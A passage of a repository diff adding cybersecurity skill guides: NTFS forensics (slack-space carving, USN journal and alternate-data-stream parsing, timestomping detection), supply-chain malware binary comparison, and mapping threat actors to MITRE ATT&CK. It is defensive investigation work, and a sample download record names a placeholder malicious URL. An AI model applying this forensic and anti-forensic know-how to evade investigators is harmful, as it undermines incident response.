foremost -t jpg,pdf,zip -i /cases/case-2024-001/ntfs/slack_space.raw \
|
||||
-o /cases/case-2024-001/carved/slack_carved/
|
||||
|
||||
# Use bulk_extractor to find structured data in slack
|
||||
bulk_extractor -o /cases/case-2024-001/analysis/bulk_extract/ \
|
||||
/cases/case-2024-001/ntfs/slack_space.raw
|
||||
```
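The slack calculation mentioned in the script comments can be made concrete. The sketch below splits the slack of a non-resident file into RAM slack and drive slack from its logical size. The function name and the default sector and cluster sizes are assumptions; the real values should be read from the `fsstat` output for the volume. Small files stored resident inside the MFT record do not occupy a cluster and are out of scope here.

```python
def slack_layout(file_size: int, sector_size: int = 512, cluster_size: int = 4096) -> dict:
    """Compute slack regions for a non-resident file of `file_size` bytes."""
    if file_size <= 0:
        return {"allocated": 0, "ram_slack": 0, "drive_slack": 0, "total_slack": 0}
    # Bytes from the end of the file to the end of its last sector.
    ram_slack = (-file_size) % sector_size
    # Round the file size up to a whole number of clusters.
    allocated = -(-file_size // cluster_size) * cluster_size
    total_slack = allocated - file_size
    # Whole sectors left unused in the last cluster.
    drive_slack = total_slack - ram_slack
    return {
        "allocated": allocated,
        "ram_slack": ram_slack,
        "drive_slack": drive_slack,
        "total_slack": total_slack,
    }


print(slack_layout(5000))
```

For a 5000-byte file with 512-byte sectors and 4096-byte clusters, two clusters (8192 bytes) are allocated, leaving 120 bytes of RAM slack and 3072 bytes (six sectors) of drive slack.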
|
||||
|
||||
### Step 4: Parse the USN Change Journal
|
||||
|
||||
```bash
|
||||
# Parse USN Journal with MFTECmd
|
||||
MFTECmd.exe -f "C:\cases\ntfs\UsnJrnl_J" --csv "C:\cases\analysis" --csvf usn_journal.csv
|
||||
|
||||
# Python USN Journal parsing
|
||||
pip install pyusn
|
||||
|
||||
python3 << 'PYEOF'
|
||||
import struct
|
||||
import csv
|
||||
from datetime import datetime, timedelta
|
||||
|
||||
def parse_usn_record(data, offset):
|
||||
"""Parse a single USN_RECORD_V2."""
|
||||
if offset + 8 > len(data):
|
||||
return None, offset
|
||||
|
||||
record_len = struct.unpack_from('<I', data, offset)[0]
|
||||
if record_len < 60 or record_len > 65536 or offset + record_len > len(data):  # USN_RECORD_V2 fixed header is 60 bytes
|
||||
return None, offset + 8
|
||||
|
||||
major_ver = struct.unpack_from('<H', data, offset + 4)[0]
|
||||
if major_ver != 2:
|
||||
return None, offset + record_len
|
||||
|
||||
mft_ref = struct.unpack_from('<Q', data, offset + 8)[0] & 0xFFFFFFFFFFFF
|
||||
parent_ref = struct.unpack_from('<Q', data, offset + 16)[0] & 0xFFFFFFFFFFFF
|
||||
usn = struct.unpack_from('<Q', data, offset + 24)[0]
|
||||
timestamp = struct.unpack_from('<Q', data, offset + 32)[0]
|
||||
reason = struct.unpack_from('<I', data, offset + 40)[0]
|
||||
source_info = struct.unpack_from('<I', data, offset + 44)[0]
|
||||
security_id = struct.unpack_from('<I', data, offset + 48)[0]
|
||||
file_attrs = struct.unpack_from('<I', data, offset + 52)[0]
|
||||
filename_len = struct.unpack_from('<H', data, offset + 56)[0]
|
||||
filename_off = struct.unpack_from('<H', data, offset + 58)[0]
|
||||
|
||||
name = data[offset + filename_off:offset + filename_off + filename_len].decode('utf-16-le', errors='ignore')
|
||||
|
||||
# Convert Windows FILETIME to datetime
|
||||
ts = datetime(1601, 1, 1) + timedelta(microseconds=timestamp // 10)
|
||||
|
||||
# Decode reason flags
|
||||
reasons = []
|
||||
reason_flags = {
|
||||
0x01: 'DATA_OVERWRITE', 0x02: 'DATA_EXTEND', 0x04: 'DATA_TRUNCATION',
|
||||
0x10: 'NAMED_DATA_OVERWRITE', 0x20: 'NAMED_DATA_EXTEND', 0x40: 'NAMED_DATA_TRUNCATION',
|
||||
0x100: 'FILE_CREATE', 0x200: 'FILE_DELETE', 0x400: 'EA_CHANGE',
|
||||
0x800: 'SECURITY_CHANGE', 0x1000: 'RENAME_OLD_NAME', 0x2000: 'RENAME_NEW_NAME',
|
||||
0x4000: 'INDEXABLE_CHANGE', 0x8000: 'BASIC_INFO_CHANGE',
|
||||
0x10000: 'HARD_LINK_CHANGE', 0x20000: 'COMPRESSION_CHANGE',
|
||||
0x40000: 'ENCRYPTION_CHANGE', 0x80000: 'OBJECT_ID_CHANGE',
|
||||
0x100000: 'REPARSE_POINT_CHANGE', 0x200000: 'STREAM_CHANGE',
|
||||
0x80000000: 'CLOSE'
|
||||
}
|
||||
for flag, desc in reason_flags.items():
|
||||
if reason & flag:
|
||||
reasons.append(desc)
|
||||
|
||||
record = {
|
||||
'timestamp': ts.strftime('%Y-%m-%d %H:%M:%S'),
|
||||
'filename': name,
|
||||
'mft_entry': mft_ref,
|
||||
'parent_entry': parent_ref,
|
||||
'reasons': '|'.join(reasons),
|
||||
'usn': usn
|
||||
}
|
||||
|
||||
return record, offset + record_len
|
||||
|
||||
# Parse the journal
|
||||
with open('/cases/case-2024-001/ntfs/UsnJrnl_J', 'rb') as f:
|
||||
data = f.read()
|
||||
|
||||
records = []
|
||||
offset = 0
|
||||
while offset < len(data) - 8:
|
||||
record, offset = parse_usn_record(data, offset)
|
||||
if record:
|
||||
records.append(record)
|
||||
else:
|
||||
pass  # parse_usn_record() has already advanced the offset past the invalid or zero-filled region
|
||||
|
||||
# Filter for deletion events
|
||||
deletions = [r for r in records if 'FILE_DELETE' in r['reasons']]
|
||||
creations = [r for r in records if 'FILE_CREATE' in r['reasons']]
|
||||
renames = [r for r in records if 'RENAME_NEW_NAME' in r['reasons']]
|
||||
|
||||
print(f"Total USN records: {len(records)}")
|
||||
print(f"File creations: {len(creations)}")
|
||||
print(f"File deletions: {len(deletions)}")
|
||||
print(f"File renames: {len(renames)}")
|
||||
|
||||
print("\n=== RECENT DELETIONS ===")
|
||||
for r in deletions[-20:]:
|
||||
print(f" [{r['timestamp']}] DELETED: {r['filename']} (MFT#{r['mft_entry']})")
|
||||
|
||||
# Write full journal to CSV
|
||||
with open('/cases/case-2024-001/analysis/usn_journal.csv', 'w', newline='') as f:
|
||||
writer = csv.DictWriter(f, fieldnames=['timestamp', 'filename', 'mft_entry', 'parent_entry', 'reasons', 'usn'])
|
||||
writer.writeheader()
|
||||
writer.writerows(records)
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 5: Detect and Analyze Alternate Data Streams
|
||||
|
||||
```bash
# List all Alternate Data Streams in the image
find /mnt/evidence -exec getfattr -d {} \; 2>/dev/null | grep -i "ads\|zone\|stream"

# Using Sleuth Kit to find ADS
# Every fls line has a colon after the metadata address, so match a second colon in the name
fls -r -o 2048 /cases/case-2024-001/images/evidence.dd | grep -E ':[[:space:]].*:' | \
    tee /cases/case-2024-001/analysis/ads_list.txt

# Extract specific ADS content
# Format: icat image inode-type-id (the attribute address fls prints for the stream, e.g. 14523-128-4)
icat -o 2048 /cases/case-2024-001/images/evidence.dd 14523-128-4 \
    > /cases/case-2024-001/analysis/extracted_ads.bin

# Check Zone.Identifier streams (download origin tracking)
fls -r -o 2048 /cases/case-2024-001/images/evidence.dd | grep "Zone.Identifier" | \
while read -r line; do
    # Take the inode-type-id address regardless of depth (+) or deleted (*) markers
    inode=$(echo "$line" | grep -oE '[0-9]+-[0-9]+-[0-9]+' | head -n 1)
    echo "=== $line ==="
    icat -o 2048 /cases/case-2024-001/images/evidence.dd "$inode" 2>/dev/null
    echo ""
done > /cases/case-2024-001/analysis/zone_identifiers.txt

# Zone.Identifier content reveals:
# [ZoneTransfer]
# ZoneId=3  (3 = Internet, indicating file was downloaded)
# ReferrerUrl=https://malicious-site.com/payload.exe
# HostUrl=https://cdn.malicious-site.com/payload.exe
```
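
The extracted Zone.Identifier streams are small INI-style text blocks, so they can be summarized programmatically. The sketch below is one possible approach using only the Python standard library; the function name `parse_zone_identifier` and the `ZONE_NAMES` lookup are illustrative helpers, not part of any tool mentioned above, and the sample text is the example content from the comments in the previous block.

```python
import configparser

# Windows URL security zone IDs
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}


def parse_zone_identifier(text):
    """Return the [ZoneTransfer] fields of a Zone.Identifier stream as a dict."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str  # keep key case (ZoneId, HostUrl)
    try:
        parser.read_string(text)
    except configparser.Error:
        return {}  # not INI-formatted, e.g. a stream that was only named Zone.Identifier
    if not parser.has_section("ZoneTransfer"):
        return {}
    return dict(parser["ZoneTransfer"])


sample = (
    "[ZoneTransfer]\n"
    "ZoneId=3\n"
    "ReferrerUrl=https://malicious-site.com/payload.exe\n"
    "HostUrl=https://cdn.malicious-site.com/payload.exe\n"
)
fields = parse_zone_identifier(sample)
zone = int(fields.get("ZoneId", -1))
print(ZONE_NAMES.get(zone, "Unknown"), fields.get("HostUrl"))
```

Returning an empty dict for unparseable input keeps a batch run going when a stream has been overwritten or was never a real Zone.Identifier.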
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|---------|-------------|
| File slack | Unused space between file end and cluster boundary containing residual data |
| RAM slack | Portion of slack from file end to sector boundary (historically filled with RAM) |
| MFT ($MFT) | Master File Table - NTFS metadata database with entries for every file |
| USN Journal ($UsnJrnl) | Change journal recording all file/directory modifications on NTFS |
| Alternate Data Streams | NTFS feature allowing multiple data streams per file (hidden storage) |
| $STANDARD_INFORMATION | MFT attribute with timestamps modifiable by user-mode applications |
| $FILE_NAME | MFT attribute with timestamps only modifiable by the kernel |
| Timestomping | Anti-forensic technique modifying file timestamps to avoid detection |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|------|---------|
| MFTECmd | Eric Zimmerman MFT and USN Journal parser with CSV output |
| MFTExplorer | Interactive GUI tool for MFT analysis |
| analyzeMFT | Python MFT parser with CSV/JSON output |
| The Sleuth Kit | File system forensics toolkit (fls, icat, blkls, istat) |
| bulk_extractor | Feature extraction from raw data including slack space |
| NTFS Log Tracker | Tool for parsing $LogFile transaction records |
| streams.exe | Sysinternals tool for listing NTFS Alternate Data Streams |
| Plaso | Super-timeline tool parsing MFT and USN Journal |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Anti-Forensics Detection via Timestomping**
|
||||
Compare the $STANDARD_INFORMATION timestamps with the $FILE_NAME timestamps in each MFT entry. Flag files whose $SI timestamps predate their $FN timestamps, which is rare in normal operation. Treat flagged files as candidates for deliberate manipulation and correlate them with other timeline evidence before drawing conclusions.
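
The $SI versus $FN comparison from Scenario 1 can be sketched in a few lines of Python. This is a minimal illustration, assuming the MFT has already been parsed into dictionaries; the keys `si_created` and `fn_created` and the sample entries are hypothetical, so map them to whatever column names your MFT parser actually emits.

```python
from datetime import datetime


def find_timestomp_candidates(entries):
    """Return entries whose $SI creation time is earlier than the $FN creation time."""
    flagged = []
    for entry in entries:
        si = datetime.fromisoformat(entry["si_created"])
        fn = datetime.fromisoformat(entry["fn_created"])
        if si < fn:
            # Keep the gap so analysts can sort by how far the timestamp was pushed back
            flagged.append({**entry, "delta_seconds": (fn - si).total_seconds()})
    return flagged


# Hypothetical parsed MFT entries
entries = [
    {"filename": "report.docx", "si_created": "2024-01-10 09:15:00", "fn_created": "2024-01-10 09:15:00"},
    {"filename": "svchost.exe", "si_created": "2019-03-02 11:00:00", "fn_created": "2024-01-18 22:41:07"},
]

candidates = find_timestomp_candidates(entries)
for hit in candidates:
    print(hit["filename"], hit["delta_seconds"])
```

A hit is only a lead: file copies and some installers can also produce mismatched timestamps, so each candidate still needs corroboration.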
|
||||
|
||||
**Scenario 2: Hidden Data in Alternate Data Streams**
|
||||
Scan for ADS attached to files beyond the standard Zone.Identifier stream and extract their content for analysis. Check for hidden executables or documents stored in ADS, correlate ADS creation times with the user activity timeline, and document the findings as evidence.
|
||||
|
||||
**Scenario 3: Deleted File Reconstruction from MFT**
|
||||
Parse the MFT for inactive (deleted) entries and extract the filenames, sizes, and timestamps of the deleted files. Recover file content with icat where the data clusters have not been overwritten, build a list of deleted evidence files, and correlate it with USN Journal delete events.
|
||||
|
||||
**Scenario 4: File Activity Reconstruction from USN Journal**
|
||||
Parse the USN Change Journal for the investigation period and identify file creation, modification, rename, and deletion events. Reconstruct the sequence of file operations, look for evidence of data staging (a create, copy, compress, delete pattern), and identify anti-forensic file wiping.
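
One way to surface the create-then-delete pattern from Scenario 4 is to pair `FILE_CREATE` and `FILE_DELETE` events for the same MFT entry and keep the short-lived files. The sketch below assumes records shaped like the rows written to `usn_journal.csv` earlier (`timestamp`, `filename`, `mft_entry`, `reasons`); the function name, the 30-minute threshold, and the sample records are illustrative assumptions.

```python
from datetime import datetime, timedelta


def find_short_lived_files(records, max_lifetime=timedelta(minutes=30)):
    """Pair FILE_CREATE and FILE_DELETE events per MFT entry and keep short lifetimes."""
    created = {}
    hits = []
    # The timestamp format sorts correctly as plain text
    for rec in sorted(records, key=lambda r: r["timestamp"]):
        ts = datetime.strptime(rec["timestamp"], "%Y-%m-%d %H:%M:%S")
        reasons = rec["reasons"].split("|")
        key = rec["mft_entry"]
        if "FILE_CREATE" in reasons:
            created[key] = (ts, rec["filename"])
        if "FILE_DELETE" in reasons and key in created:
            start, name = created.pop(key)
            if ts - start <= max_lifetime:
                hits.append({"filename": name, "created": start, "deleted": ts})
    return hits


# Hypothetical journal records
records = [
    {"timestamp": "2024-01-02 08:00:00", "filename": "notes.txt", "mft_entry": 502, "reasons": "FILE_CREATE"},
    {"timestamp": "2024-01-18 22:40:00", "filename": "staging.7z", "mft_entry": 501, "reasons": "FILE_CREATE"},
    {"timestamp": "2024-01-18 22:55:00", "filename": "staging.7z", "mft_entry": 501, "reasons": "FILE_DELETE|CLOSE"},
    {"timestamp": "2024-01-15 17:30:00", "filename": "notes.txt", "mft_entry": 502, "reasons": "FILE_DELETE|CLOSE"},
]

short_lived = find_short_lived_files(records)
for hit in short_lived:
    print(hit["filename"], hit["created"], hit["deleted"])
```

MFT entry numbers are reused over time, so on long journals it is safer to key on the entry number together with its sequence number if your parser exposes both.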
|
||||
|
||||
## Output Format
|
||||
|
||||
```
File System Artifact Analysis:
  Volume: NTFS (Partition 2, 465 GB)
  Cluster Size: 4096 bytes

  MFT Analysis:
    Total Entries: 456,789
    Active Files: 234,567
    Deleted Entries: 12,345 (8,901 with recoverable metadata)
    Timestomped Files: 23 (SI/FN mismatch detected)

  USN Journal:
    Records Parsed: 2,345,678
    Date Range: 2024-01-01 to 2024-01-20
    File Creations: 45,678
    File Deletions: 23,456
    File Renames: 12,345

  Alternate Data Streams:
    Total ADS Found: 1,234
    Zone.Identifier: 890 (downloaded files)
    Custom/Suspicious ADS: 5 (hidden data detected)

  Slack Space:
    Total Slack: 12.3 GB
    Keyword Hits: 45 (passwords, credit cards)
    Carved Files: 23 from slack space

  Suspicious Findings:
    - 23 files with timestomped timestamps
    - 5 files with hidden ADS containing data
    - USN shows mass deletion on 2024-01-18 (anti-forensics)
    - Slack space contains residual email fragments

  Reports: /cases/case-2024-001/analysis/
```
|
||||
@@ -0,0 +1,133 @@
|
||||
---
|
||||
name: analyzing-supply-chain-malware-artifacts
|
||||
description: Investigate supply chain attack artifacts including trojanized software updates, compromised build pipelines, and sideloaded dependencies to identify intrusion vectors and scope of compromise.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [supply-chain, malware-analysis, trojanized-software, solarwinds, 3cx, dependency-confusion, software-integrity]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Supply Chain Malware Artifacts
|
||||
|
||||
## Overview
|
||||
|
||||
Supply chain attacks compromise legitimate software distribution channels to deliver malware through trusted update mechanisms. Notable examples include SolarWinds SUNBURST (2020, with the trojanized update reaching roughly 18,000 customers), 3CX SmoothOperator (2023, a cascading supply chain attack that began with a trojanized Trading Technologies installer), and numerous npm/PyPI package poisoning campaigns. Analysis involves comparing trojanized binaries against legitimate versions, identifying injected code in build artifacts, examining code signing anomalies, and tracing the infection chain from initial compromise through payload delivery. The 2025 Verizon Data Breach Investigations Report attributed about 30% of breaches to third-party involvement, roughly double the prior year's share.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `pefile` and `ssdeep` (`hashlib` ships with the standard library)
|
||||
- Binary diff tools (BinDiff, Diaphora)
|
||||
- Code signing verification tools (sigcheck, codesign)
|
||||
- Software composition analysis (SCA) tools
|
||||
- Access to legitimate software versions for comparison
|
||||
- Package repository monitoring (npm, PyPI, NuGet)
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Binary Comparison Analysis
|
||||
|
||||
```python
#!/usr/bin/env python3
"""Compare trojanized binary against legitimate version."""
import hashlib
import json
import sys

import pefile


def section_summary(pe):
    """Map each section name to its size, entropy, and characteristics."""
    return {
        s.Name.rstrip(b'\x00').decode(errors='replace'): {
            "size": s.SizeOfRawData,
            "entropy": s.get_entropy(),
            "characteristics": s.Characteristics,
        }
        for s in pe.sections
    }


def import_set(pe):
    """Collect named imports as 'dll!function' strings (ordinal-only imports are skipped)."""
    imports = set()
    for entry in getattr(pe, 'DIRECTORY_ENTRY_IMPORT', []):
        for imp in entry.imports:
            if imp.name:
                imports.add(f"{entry.dll.decode()}!{imp.name.decode()}")
    return imports


def compare_pe_files(legitimate_path, suspect_path):
    """Compare PE file structures between legitimate and suspect versions."""
    legit_pe = pefile.PE(legitimate_path)
    suspect_pe = pefile.PE(suspect_path)

    report = {"differences": [], "suspicious_sections": [], "import_changes": []}

    # Compare sections
    legit_sections = section_summary(legit_pe)
    suspect_sections = section_summary(suspect_pe)

    # Find new or modified sections
    for name, props in suspect_sections.items():
        if name not in legit_sections:
            report["suspicious_sections"].append({
                "name": name, "reason": "New section not in legitimate version",
                "size": props["size"], "entropy": round(props["entropy"], 2),
            })
        elif abs(props["size"] - legit_sections[name]["size"]) > 1024:
            report["suspicious_sections"].append({
                "name": name, "reason": "Section size significantly changed",
                "legit_size": legit_sections[name]["size"],
                "suspect_size": props["size"],
            })

    # Compare imports
    new_imports = import_set(suspect_pe) - import_set(legit_pe)
    if new_imports:
        report["import_changes"] = sorted(new_imports)

    # Check code signing. Data directory 4 is the security (certificate) directory.
    # A non-zero size only shows that a signature is embedded; it does not validate it.
    report["legit_signed"] = bool(legit_pe.OPTIONAL_HEADER.DATA_DIRECTORY[4].Size)
    report["suspect_signed"] = bool(suspect_pe.OPTIONAL_HEADER.DATA_DIRECTORY[4].Size)

    return report


def hash_file(filepath):
    """Calculate multiple hashes for a file."""
    hashes = {}
    with open(filepath, 'rb') as f:
        data = f.read()
    for algo in ['md5', 'sha1', 'sha256']:
        h = hashlib.new(algo)
        h.update(data)
        hashes[algo] = h.hexdigest()
    return hashes


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <legitimate_binary> <suspect_binary>")
        sys.exit(1)
    report = compare_pe_files(sys.argv[1], sys.argv[2])
    # Record file hashes so the report identifies exactly which builds were compared
    report["hashes"] = {
        "legitimate": hash_file(sys.argv[1]),
        "suspect": hash_file(sys.argv[2]),
    }
    print(json.dumps(report, indent=2))
```
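
The same legitimate-versus-suspect comparison applies to unpacked packages (for example, two versions of an npm or PyPI release) rather than single PE files. The sketch below is a minimal illustration using only the standard library: it hashes every file in two directory trees and reports added, removed, and modified paths. The function names and the throwaway demo directories are assumptions made for this example.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_tree(root):
    """Map each file path (relative to root) to its SHA-256 digest."""
    root = Path(root)
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            h = hashlib.sha256()
            with path.open("rb") as f:
                # Read in 1 MiB chunks so large artifacts do not have to fit in memory
                for chunk in iter(lambda: f.read(1 << 20), b""):
                    h.update(chunk)
            digests[path.relative_to(root).as_posix()] = h.hexdigest()
    return digests


def diff_trees(legit_root, suspect_root):
    """Report files added to, removed from, or modified in the suspect tree."""
    legit, suspect = sha256_tree(legit_root), sha256_tree(suspect_root)
    return {
        "added": sorted(suspect.keys() - legit.keys()),
        "removed": sorted(legit.keys() - suspect.keys()),
        "modified": sorted(p for p in legit.keys() & suspect.keys() if legit[p] != suspect[p]),
    }


# Demo on two throwaway directories standing in for unpacked packages
with tempfile.TemporaryDirectory() as tmp:
    legit, suspect = Path(tmp, "legit"), Path(tmp, "suspect")
    for d in (legit, suspect):
        (d / "lib").mkdir(parents=True)
        (d / "lib" / "core.py").write_text("print('ok')\n")
    (suspect / "lib" / "core.py").write_text("print('ok')\nimport os\n")
    (suspect / "setup_hook.py").write_text("# unexpected file\n")
    result = diff_trees(legit, suspect)

print(result)
```

Added files and modified install hooks are usually the first places to look, since package poisoning often hides in scripts that run at install time.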
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- Trojanized components identified through binary diffing
|
||||
- Injected code isolated and analyzed separately
|
||||
- Code signing anomalies documented
|
||||
- Infection timeline reconstructed from build artifacts
|
||||
- Downstream impact scope assessed across affected systems
|
||||
- IOCs extracted for detection and blocking
|
||||
|
||||
## References
|
||||
|
||||
- [ReversingLabs - 3CX Supply Chain Analysis](https://www.reversinglabs.com/blog/what-went-wrong-with-the-3cx-software-supply-chain-attack-and-how-it-could-have-been-prevented)
|
||||
- [Fortinet - SolarWinds Supply Chain Attack](https://www.fortinet.com/resources/cyberglossary/solarwinds-cyber-attack)
|
||||
- [Picus - 3CX SmoothOperator Analysis](https://www.picussecurity.com/resource/blog/smoothoperator-analysis-of-3cxdesktopapp-supply-chain-attack)
|
||||
- [MITRE ATT&CK T1195 - Supply Chain Compromise](https://attack.mitre.org/techniques/T1195/)
|
||||
@@ -0,0 +1,25 @@
|
||||
# Analysis Report Template - analyzing-supply-chain-malware-artifacts
|
||||
|
||||
## Sample Information
|
||||
| Field | Value |
|-------|-------|
| SHA-256 | |
| File Type | |
| Analysis Date | |
| Analyst | |
| Classification | TLP:AMBER |
|
||||
|
||||
## Findings
|
||||
| Finding | Severity | Details |
|---------|----------|---------|
| | | |
|
||||
|
||||
## IOCs Extracted
|
||||
| Type | Value | Context |
|------|-------|---------|
| | | |
|
||||
|
||||
## Recommendations
|
||||
1.
|
||||
2.
|
||||
3.
|
||||
@@ -0,0 +1,9 @@
|
||||
# Standards Reference - analyzing-supply-chain-malware-artifacts
|
||||
|
||||
## Applicable Standards
|
||||
- MITRE ATT&CK Framework
|
||||
- NIST SP 800-83 Guide to Malware Incident Prevention
|
||||
- NIST SP 800-86 Guide to Integrating Forensic Techniques
|
||||
|
||||
## Related MITRE ATT&CK Techniques
|
||||
See SKILL.md for specific technique mappings.
|
||||
@@ -0,0 +1,11 @@
|
||||
# Analysis Workflows - analyzing-supply-chain-malware-artifacts
|
||||
|
||||
## Primary Workflow
|
||||
```
[Sample Collection] --> [Static Analysis] --> [Dynamic Analysis] --> [IOC Extraction]
                                                                            |
                                                                            v
                                                                   [Report Generation]
```
|
||||
|
||||
See SKILL.md for detailed step-by-step procedures.
|
||||
@@ -0,0 +1,255 @@
|
||||
---
|
||||
name: analyzing-threat-actor-ttps-with-mitre-attack
|
||||
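description: MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world observations. This skill covers systematically mapping threat actor behavior to the ATT&CK framework, building technique coverage heatmaps with the ATT&CK Navigator, and identifying detection gaps.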
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [threat-intelligence, cti, ioc, mitre-attack, stix, ttp-analysis, threat-actors]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Threat Actor TTPs with MITRE ATT&CK
|
||||
|
||||
## Overview
|
||||
|
||||
MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world observations. This skill covers systematically mapping threat actor behavior to the ATT&CK framework, building technique coverage heatmaps using the ATT&CK Navigator, identifying detection gaps, and producing actionable intelligence reports that link observed IOCs to specific adversary techniques across the Enterprise, Mobile, and ICS matrices.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `mitreattack-python`, `attackcti`, `stix2` libraries
|
||||
- MITRE ATT&CK Navigator (web-based or local deployment)
|
||||
- Understanding of ATT&CK matrix structure: Tactics, Techniques, Sub-techniques
|
||||
- Access to threat intelligence reports or MISP/OpenCTI for threat actor data
|
||||
- Familiarity with STIX 2.1 Attack Pattern objects
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### ATT&CK Matrix Structure
|
||||
|
||||
The ATT&CK Enterprise matrix organizes adversary behavior into 14 Tactics (the "why") containing Techniques (the "how") and Sub-techniques (specific implementations). Each technique has associated data sources, detections, mitigations, and real-world procedure examples from observed threat groups.
|
||||
|
||||
### Threat Group Profiles
|
||||
|
||||
ATT&CK catalogs over 140 threat groups (e.g., APT28, APT29, Lazarus Group, FIN7) with documented technique usage. Each group profile includes aliases, targeted sectors, associated campaigns, software used, and technique mappings with procedure-level detail.
|
||||
|
||||
### ATT&CK Navigator
|
||||
|
||||
The ATT&CK Navigator is a web-based tool for creating custom ATT&CK matrix visualizations. Analysts create layers (JSON files) that annotate techniques with scores, colors, comments, and metadata to visualize threat actor coverage, detection capabilities, or risk assessments.
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Query ATT&CK Data Programmatically
|
||||
|
||||
```python
from attackcti import attack_client
import json

# Initialize ATT&CK client (queries MITRE TAXII server)
lift = attack_client()

# Get all Enterprise techniques
enterprise_techniques = lift.get_enterprise_techniques()
print(f"Total Enterprise techniques: {len(enterprise_techniques)}")

# Get all threat groups
groups = lift.get_groups()
print(f"Total threat groups: {len(groups)}")

# Get specific group by name
apt29 = [g for g in groups if 'APT29' in g.get('name', '')]
if apt29:
    group = apt29[0]
    print(f"Group: {group['name']}")
    print(f"Aliases: {group.get('aliases', [])}")
    print(f"Description: {group.get('description', '')[:200]}")
```
|
||||
|
||||
### Step 2: Map Threat Actor to ATT&CK Techniques
|
||||
|
||||
```python
from attackcti import attack_client

lift = attack_client()

# Look up the APT29 group object by its ATT&CK ID (G0016).
# attackcti's get_techniques_used_by_group() takes the group's STIX object rather than
# the ID string (check this against your installed attackcti version).
apt29 = next(
    g for g in lift.get_groups()
    if any(ref.get("external_id") == "G0016" for ref in g.get("external_references", []))
)

# Get techniques used by APT29
apt29_techniques = lift.get_techniques_used_by_group(apt29)

technique_map = {}
for entry in apt29_techniques:
    tech_id = entry.get("external_references", [{}])[0].get("external_id", "")
    tech_name = entry.get("name", "")
    description = entry.get("description", "")
    tactic_refs = [
        phase.get("phase_name", "")
        for phase in entry.get("kill_chain_phases", [])
    ]

    technique_map[tech_id] = {
        "name": tech_name,
        "tactics": tactic_refs,
        "description": description[:300],
    }

print(f"\nAPT29 uses {len(technique_map)} techniques:")
for tid, info in sorted(technique_map.items()):
    print(f"  {tid}: {info['name']} [{', '.join(info['tactics'])}]")
```
|
||||
|
||||
### Step 3: Generate ATT&CK Navigator Layer
|
||||
|
||||
```python
import json


def create_navigator_layer(group_name, technique_map, description=""):
    """Generate ATT&CK Navigator layer JSON for a threat group."""
    techniques_list = []
    for tech_id, info in technique_map.items():
        techniques_list.append({
            "techniqueID": tech_id,
            "tactic": info["tactics"][0] if info["tactics"] else "",
            "color": "#ff6666",  # Red for observed techniques
            "comment": info["description"][:200],
            "enabled": True,
            "score": 100,
            "metadata": [
                {"name": "group", "value": group_name},
            ],
        })

    layer = {
        "name": f"{group_name} TTP Coverage",
        "versions": {
            "attack": "16.1",
            "navigator": "5.1.0",
            "layer": "4.5",
        },
        "domain": "enterprise-attack",
        "description": description or f"Techniques attributed to {group_name}",
        "filters": {"platforms": ["Windows", "Linux", "macOS", "Cloud"]},
        "sorting": 0,
        "layout": {
            "layout": "side",
            "aggregateFunction": "average",
            "showID": True,
            "showName": True,
            "showAggregateScores": False,
            "countUnscored": False,
        },
        "hideDisabled": False,
        "techniques": techniques_list,
        "gradient": {
            "colors": ["#ffffff", "#ff6666"],
            "minValue": 0,
            "maxValue": 100,
        },
        "legendItems": [
            {"label": "Observed technique", "color": "#ff6666"},
            {"label": "Not observed", "color": "#ffffff"},
        ],
        "showTacticRowBackground": True,
        "tacticRowBackground": "#dddddd",
        "selectTechniquesAcrossTactics": True,
        "selectSubtechniquesWithParent": False,
        "selectVisibleTechniques": False,
    }

    return layer


# Generate and save layer
layer = create_navigator_layer("APT29", technique_map, "APT29 (Cozy Bear) TTP analysis")
with open("apt29_navigator_layer.json", "w") as f:
    json.dump(layer, f, indent=2)
print("[+] Navigator layer saved to apt29_navigator_layer.json")
```
|
||||
|
||||
### Step 4: Identify Detection Gaps
|
||||
|
||||
```python
from attackcti import attack_client

lift = attack_client()

# Get all techniques with data sources
all_techniques = lift.get_enterprise_techniques()

# Build data source coverage map
data_source_coverage = {}
for tech in all_techniques:
    tech_id = tech.get("external_references", [{}])[0].get("external_id", "")
    data_sources = tech.get("x_mitre_data_sources", [])

    for ds in data_sources:
        if ds not in data_source_coverage:
            data_source_coverage[ds] = []
        data_source_coverage[ds].append(tech_id)

# Compare threat actor techniques against available detections
# (technique_map is the dictionary built in Step 2)
detected_techniques = {"T1059", "T1071", "T1566"}  # Example: techniques you can detect
actor_techniques = set(technique_map.keys())

covered = actor_techniques.intersection(detected_techniques)
gaps = actor_techniques - detected_techniques
total = len(actor_techniques) or 1  # avoid division by zero when the map is empty

print("\n=== Detection Gap Analysis for APT29 ===")
print(f"Actor techniques: {len(actor_techniques)}")
print(f"Detected: {len(covered)} ({len(covered)/total*100:.0f}%)")
print(f"Gaps: {len(gaps)} ({len(gaps)/total*100:.0f}%)")
print("\nUndetected techniques:")
for tech_id in sorted(gaps):
    if tech_id in technique_map:
        print(f"  {tech_id}: {technique_map[tech_id]['name']}")
```
